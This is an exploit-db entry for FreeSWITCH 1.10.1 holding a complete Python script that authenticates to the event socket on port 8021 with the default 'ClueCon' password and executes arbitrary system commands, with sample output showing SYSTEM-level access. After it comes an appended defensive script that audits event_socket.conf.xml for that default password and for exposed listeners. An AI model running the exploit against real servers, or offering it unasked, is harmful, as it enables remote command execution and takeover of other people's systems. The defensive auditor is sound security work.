FreeSWITCH 1.10.1 – Command Execution

  • Author: 1F98D
    Date: 2019-12-20
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47799/
  • # Exploit Title: FreeSWITCH 1.10.1 - Command Execution
    # Date: 2019-12-19
    # Exploit Author: 1F98D
    # Vendor Homepage: https://freeswitch.com/
    # Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
    # Version: 1.10.1
    # Tested on: Windows 10 (x64)
    #
    # FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
    # it after authenticating. By default commands are not accepted from remote hosts.
    #
    # -- Example --
    # root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
    # Authenticated
    # Content-Type: api/response
    # Content-Length: 20
    #
    # nt authority\system
    # 
    
    #!/usr/bin/python3
    
    from socket import *
    import sys
    
    if len(sys.argv) != 3:
        print('Missing arguments')
        print('Usage: freeswitch-exploit.py <target> <cmd>')
        sys.exit(1)
    
    ADDRESS=sys.argv[1]
    CMD=sys.argv[2]
    PASSWORD='ClueCon' # default password for FreeSWITCH
    
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((ADDRESS, 8021))
    
    # The service prompts for authentication as soon as a client connects
    response = s.recv(1024)
    if b'auth/request' in response:
        s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
        response = s.recv(1024)
        if b'+OK accepted' in response:
            print('Authenticated')
            # Once authenticated, the command is passed to "api system"
            s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
            response = s.recv(8096).decode()
            print(response)
        else:
            print('Authentication failed')
            sys.exit(1)
    else:
        print('Not prompted for authentication, likely not vulnerable')
        sys.exit(1)
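
A defender-side check for the exposure this script relies on, as an added example (not part of the original exploit-db entry or the FreeSWITCH project): it audits an `event_socket.conf.xml` for the default `ClueCon` password, a listener bound beyond loopback, and a missing inbound ACL. The parameter names `listen-ip`, `password` and `apply-inbound-acl`, the sample configurations and the finding labels are assumptions not shown on the page.

```python
import ipaddress
import xml.etree.ElementTree as ET

DEFAULT_PASSWORD = "ClueCon"  # default event socket password used by the script above

def make_conf(ip, password, acl=""):
    """Build a constructed event_socket.conf.xml sample (not taken from the page)."""
    return f"""<configuration name="event_socket.conf">
  <settings>
    <param name="listen-ip" value="{ip}"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="{password}"/>
    {acl}
  </settings>
</configuration>"""

SAMPLE_WEAK = make_conf("0.0.0.0", "ClueCon")
SAMPLE_HARDENED = make_conf("127.0.0.1", "constructed-long-random-secret",
                            '<param name="apply-inbound-acl" value="loopback.auto"/>')

def audit_event_socket(xml_text):
    """Return a list of finding labels for one event_socket.conf.xml document."""
    root = ET.fromstring(xml_text)  # XML comments (commented-out params) are dropped
    params = {p.get("name"): p.get("value", "") for p in root.iter("param")}
    findings = []
    # Assumption: a missing password param is treated as the default password.
    if params.get("password", DEFAULT_PASSWORD) == DEFAULT_PASSWORD:
        findings.append("default-password")
    try:
        loopback = ipaddress.ip_address(params.get("listen-ip", "")).is_loopback
    except ValueError:
        loopback = False  # empty, hostname or unexpanded variable: treat as exposed
    if not loopback:
        findings.append("non-loopback-listen-ip")
    if not params.get("apply-inbound-acl"):
        findings.append("no-inbound-acl")
    return findings

if __name__ == "__main__":
    for name, text in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(name, audit_event_socket(text) or "no findings")
```
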